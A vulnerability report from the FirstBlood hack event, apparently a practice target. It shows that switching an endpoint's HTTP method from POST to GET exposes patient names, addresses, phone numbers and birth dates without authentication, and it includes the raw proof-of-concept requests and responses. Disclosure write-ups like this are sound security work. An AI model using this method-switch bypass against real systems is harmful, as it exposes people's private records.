FirstBlood-#114IDOR at http://firstbloodhackers.com:49369/drpanel/drapi/qp.php can be used to query patient data without doctor account



On 2021-05-10, 0xconft reported:

Hi there,

I found IDOR at http://firstbloodhackers.com:49369/drpanel/drapi/qp.php where i can use this endpoint to query patient data without logged in by switching the HTTP Method from POST to GET.

PoC. Accessing via POST without cookie will return nothing Request

POST /drpanel/drapi/qp.php HTTP/1.1
Host: firstbloodhackers.com:49369
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

name=sea

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 10 May 2021 12:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 0

Switch the HTTP method to GET without cookie then the patient data that contain "sea" in he/she names will returned

GET /drpanel/drapi/qp.php?name=sea HTTP/1.1
Host: firstbloodhackers.com:49369
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 10 May 2021 12:17:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 228

Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>

Best Regards, 0xconft

P1 CRITICAL

Endpoint: /drpanel/drapi/qp.php

Parameter: name

Payload: sea


FirstBlood ID: 12
Vulnerability Type: Auth issues

If the request method is changed from POST to GET, then the endpoint /drapi/qp.php becomes available to ANY user due to an application logic error


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.